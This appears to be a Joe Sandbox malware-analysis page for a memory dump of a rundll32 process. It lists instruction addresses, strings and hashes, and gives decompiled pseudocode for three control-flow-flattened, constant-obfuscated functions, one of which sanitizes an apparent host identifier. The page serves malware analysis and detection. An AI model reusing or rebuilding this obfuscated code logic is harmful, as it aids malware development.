0x00208b3a
0x00208b42
0x00208b47
0x00208b4f
0x00208b54
0x00208b5c
0x00208b70
0x00208b77
0x00208b82
0x00208b8a
0x00208b92
0x00208b97
0x00208b9f
0x00208baa
0x00208bb2
0x00208bbd
0x00208bc5
0x00208bcd
0x00208bd2
0x00208bd7
0x00208bdf
0x00208be7
0x00208bf4
0x00208bf8
0x00208c00
0x00208c08
0x00208c10
0x00208c15
0x00208c1a
0x00208c22
0x00208c2a
0x00208c32
0x00208c3a
0x00208c42
0x00208c47
0x00208c51
0x00208c55
0x00208c5d
0x00208c65
0x00208c6d
0x00208c75
0x00208c7d
0x00208c85
0x00208c8d
0x00208c95
0x00208c9d
0x00208cb0
0x00208cb7
0x00208cc2
0x00208cca
0x00208ccf
0x00208cd7
0x00208cdf
0x00208ce7
0x00208cef
0x00208cf4
0x00208cf9
0x00208d01
0x00208d17
0x00208d1e
0x00208d21
0x00208d28
0x00208d33
0x00208d3b
0x00208d43
0x00208d4b
0x00208d53
0x00208d5b
0x00208d68
0x00208d6c
0x00208d71
0x00208d79
0x00208d79
0x00208d8b
0x00208ecd
0x00208ee0
0x00208ee5
0x00208ee8
0x00000000
0x00208d91
0x00208d97
0x00208e4f
0x00208ea1
0x00208eb3
0x00208eb7
0x00208ebc
0x00208ebf
0x00000000
0x00208d9d
0x00208da3
0x00208e45
0x00000000
0x00208da9
0x00208daf
0x00208e17
0x00208e2e
0x00208e33
0x00208e36
0x00208e3b
0x00208e3d
0x00000000
0x00208db1
0x00208db7
0x00208f65
0x00208dbd
0x00208dc3
0x00000000
0x00208dc9
0x00208dd0
0x00208dee
0x00208df5
0x00208df8
0x00208df9
0x00208e00
0x00000000
0x00208e00
0x00208dc3
0x00208db7
0x00208daf
0x00208da3
0x00208d97
0x00208f6b
0x00208f77
0x00208f77
0x00208f30
0x00208f35
0x00208f37
0x00208f3a
0x00208f3d
0x00208f49
0x00000000
0x00208f3f
0x00208f3f
0x00000000
0x00208f3f
0x00000000
0x00208f4e
0x00208f4e
0x00208f4e
0x00000000

Strings

2\c+, xrefs: 00208DA9
2X, xrefs: 00208C9D
,, xrefs: 00208C5D
EZX-, xrefs: 00208A24
Q#JK, xrefs: 002089AB
2\c+, xrefs: 00208E45
Ui=, xrefs: 00208915
At, xrefs: 00208B5C
0, xrefs: 00208A6A

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: cea823416f0d9bdc920a4920037f3bf21988036a187d94c686a4b360e9d8e897
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: 55F11F725083819FD368CF65C48A64BFBE1BBC4718F108A1DF1DA962A0D7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002126F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002126F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00201132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00202A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00216DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0020F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x21ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x21ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002076DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00208736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0021422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x002126f5
0x002126f8
0x00212700
0x0021270c
0x0021270e
0x00212710
0x00212716
0x0021271e
0x00212720
0x00212728
0x0021272d
0x00212735
0x00212743
0x00212748
0x0021274e
0x00212756
0x00212763
0x00212764
0x00212768
0x00212770
0x00212778
0x00212780
0x00212788
0x0021278d
0x00212795
0x0021279d
0x002127a5
0x002127ad
0x002127b5
0x002127c2
0x002127c6
0x002127ce
0x002127db
0x002127df
0x002127e7
0x002127ef
0x002127f7
0x002127ff
0x00212807
0x0021280f
0x00212817
0x00212824
0x00212828
0x00212830
0x00212838
0x00212846
0x0021284a
0x00212852
0x0021285a
0x00212862
0x0021286a
0x00212872
0x0021287a
0x00212882
0x0021288a
0x00212897
0x0021289b
0x002128a3
0x002128ab
0x002128b3
0x002128bb
0x002128c0
0x002128c8
0x002128d0
0x002128e0
0x002128e5
0x002128ef
0x002128f2
0x002128f7
0x002128fb
0x00212903
0x0021290b
0x00212913
0x00212918
0x0021291d
0x00212925
0x0021292d
0x00212935
0x00212939
0x00212941
0x00212949
0x00212951
0x00212959
0x00212961
0x00212966
0x0021296e
0x00212976
0x0021297e
0x00212988
0x0021298c
0x00212994
0x00212994
0x00212999
0x0021299e
0x002129ac
0x00212a76
0x00212a93
0x00212a98
0x00212a9b
0x00212a9e
0x00212aa5
0x00212aaf
0x00212a3e
0x00212a3e
0x00000000
0x00212a3e
0x002129b8
0x00212a48
0x00212a5a
0x00212a5f
0x00212a62
0x00212a65
0x00212a6c
0x00212a71
0x00212a39
0x00212a39
0x00000000
0x00212a39
0x002129c4
0x00000000
0x00212b0d
0x002129cc
0x00212ae7
0x00212aea
0x00212aef
0x00212af2
0x00000000
0x00212af2
0x002129d8
0x002129dc
0x00212ad9
0x00212ad9
0x00212adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002129e2
0x002129f1
0x002129f6
0x002129f9
0x00212a03
0x00212a08
0x00000000
0x00212a08
0x002129dc
0x00212a19
0x00212a1a
0x00212a1d
0x00212a1e
0x00212a23
0x00212a27
0x00212a29
0x00212a2f
0x00212a34
0x00000000
0x00212a34
0x00212b15
0x00000000
0x00212b15
0x00212abf
0x00212ac5
0x00212acf
0x00212ad4
0x00000000
0x00212ad4

Strings

}:{, xrefs: 0021284A
XLq, xrefs: 00212700
6x, xrefs: 00212862
*, xrefs: 0021274E
4, xrefs: 00212756
*, xrefs: 0021290B
e), xrefs: 00212768
., xrefs: 002128D0
!, xrefs: 0021286A

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: 5c38b6f125db07a54c5900066822a09d43aae1bc8e0ef2174ad6639be7235907
Instruction ID: 784f2b23dc27635565ce336a8549485c6af866d54d1a6742579a82e124fb32e1
Opcode Fuzzy Hash: 5c38b6f125db07a54c5900066822a09d43aae1bc8e0ef2174ad6639be7235907
Instruction Fuzzy Hash: 1EA162729183419FD368CF25C88944BFBE1FB94718F108A1DF1899A2A0D3B5CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002163C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002163C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x21ca2c; // 0x495cc8
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0020F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00202959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0021507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00205FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00205FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x002163c1
0x002163c4
0x002163d2
0x002163d4
0x002163d9
0x002163dd
0x002163e5
0x002163ed
0x002163f5
0x002163fd
0x00216405
0x0021640d
0x00216412
0x0021641a
0x00216422
0x0021642a
0x00216432
0x0021643a
0x00216442
0x0021644a
0x00216450
0x00216455
0x0021645b
0x00216463
0x0021646b
0x00216473
0x0021647b
0x00216483
0x0021648f
0x00216494
0x0021649a
0x0021649f
0x002164a7
0x002164b4
0x002164b7
0x002164bb
0x002164c3
0x002164cb
0x002164d3
0x002164d8
0x002164dd
0x002164e5
0x002164f5
0x002164f9
0x00216501
0x00216509
0x00216511
0x0021651d
0x00216520
0x00216524
0x0021652c
0x00216534
0x0021653c
0x00216544
0x0021654c
0x00216554
0x0021655c
0x00216564
0x0021656c
0x00216574
0x00216578
0x00216580
0x0021658d
0x00216591
0x00216599
0x002165a1
0x002165a9
0x002165ae
0x002165b6
0x002165be
0x002165c6
0x002165cb
0x002165d3
0x002165d7
0x002165db
0x002165df
0x002165e7
0x002165ef
0x002165f7
0x002165ff
0x002165ff
0x00216601
0x00216602
0x00216602
0x00216607
0x00000000
0x00216607
0x00216619
0x002166f6
0x002166fc
0x00216707
0x00216704
0x00216704
0x0021670c
0x0021670f
0x00000000
0x0021661f
0x00216625
0x002166d5
0x002166da
0x002166dd
0x002166e6
0x002166eb
0x002166f0
0x00000000
0x0021662b
0x00216631
0x002166a3
0x002166a8
0x002166aa
0x002166af
0x002166b5
0x00000000
0x002166b5
0x00216633
0x00216635
0x00216679
0x00216680
0x00216686
0x00216689
0x002165ff
0x002165ff
0x00216601
0x00000000
0x00216601
0x00216637
0x0021663d
0x0021665b
0x00216661
0x002165ff
0x002165ff
0x00216601
0x00216602
0x00000000
0x00216602
0x0021663f
0x00216645
0x00000000
0x0021664b
0x0021664b
0x00000000
0x0021664b
0x00216645
0x0021663d
0x00216635
0x00216631
0x00216625
0x00000000
0x00216619
0x00216722
0x0021672a
0x0021672f
0x00216734
0x00216735
0x00216735
0x00216741
0x0021674a
0x0021674a
0x00216602

Strings

$/, xrefs: 002164F9
ON, xrefs: 00216463
2!, xrefs: 00216578
*F, xrefs: 002164C3
VLA_k, xrefs: 0021644A
A_k, xrefs: 002163C4
@', xrefs: 002165DF
};, xrefs: 00216432
R|, xrefs: 002164A7

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: 8837ea9d0641310cc2a288f5a325bae3553b1ae0b121850a192da01f6248286d
Instruction ID: 6afa4da864e27c6be3e20b249f9b9e465a6b258434a5e9be8d0f5a2fea3ea5f1
Opcode Fuzzy Hash: 8837ea9d0641310cc2a288f5a325bae3553b1ae0b121850a192da01f6248286d
Instruction Fuzzy Hash: 598175711183819FD798CF24C49A85FBBF1FBD4358F504A1CF686466A0C7B98A98CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00212349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00212349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0020602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x21c030);
				_push(_v36);
				_t168 = E0021878F(_v28, _v32, __eflags);
				E002131E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00216A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00212025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00212350
0x00212354
0x00212356
0x0021235a
0x0021235e
0x0021235f
0x00212360
0x00212365
0x0021236d
0x00212370
0x0021237a
0x00212382
0x00212384
0x0021238c
0x00212391
0x00212399
0x002123a1
0x002123a6
0x002123ae
0x002123b6
0x002123c4
0x002123c9
0x002123cf
0x002123d7
0x002123df
0x002123e3
0x002123eb
0x002123f8
0x002123fb
0x002123ff
0x00212407
0x0021240f
0x00212417
0x0021241f
0x0021242f
0x00212433
0x0021243f
0x00212444
0x0021244a
0x00212452
0x0021245a
0x00212462
0x00212467
0x0021246f
0x00212477
0x00212483
0x00212486
0x0021248a
0x00212492
0x0021249a
0x002124a2
0x002124a7
0x002124af
0x002124b7
0x002124bf
0x002124cc
0x002124d0
0x002124d8
0x002124e0
0x002124e8
0x002124f2
0x002124ff
0x0021250c
0x00212514
0x0021251c
0x00212524
0x0021252c
0x0021253b
0x0021253c
0x00212540
0x00212548
0x0021254d
0x00212555
0x0021255d
0x00212568
0x0021256c
0x00212574
0x0021257a
0x002125bb
0x002125c0
0x002125c4
0x002125c6
0x002125c8
0x002125ca
0x002125d0
0x002125d0
0x002125d2
0x002125d8
0x002125d8
0x002125da
0x002125e0
0x002125e0
0x002125dc
0x002125dc
0x002125de
0x00000000
0x00000000
0x002125de
0x002125d4
0x002125d4
0x002125d6
0x00000000
0x00000000
0x002125d6
0x002125cc
0x002125cc
0x002125ce
0x00000000
0x00000000
0x002125ce
0x002125e3
0x002125e4
0x002125e4
0x002125e9
0x00000000
0x0021257c
0x00212582
0x002125b4
0x00000000
0x00212584
0x0021258a
0x0021265e
0x0021265e
0x00212664
0x00000000
0x00000000
0x00212590
0x002125aa
0x002125b0
0x00000000
0x002125b0
0x002125aa
0x0021258a
0x00212582
0x00212673
0x00212673
0x002125ed
0x002125f2
0x002125fe
0x0021260d
0x0021261a
0x00212637
0x0021264c
0x0021264e
0x0021264e
0x0021264e
0x00212651
0x00212656
0x00212659
0x00000000

Strings

6(, xrefs: 0021254D
, xrefs: 00212399
j^ , xrefs: 00212562
/Qq:, xrefs: 002125B4
/Qq:, xrefs: 00212584
j@, xrefs: 0021251C
E, xrefs: 0021241F
j^ , xrefs: 0021261A
o, xrefs: 002123D7

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
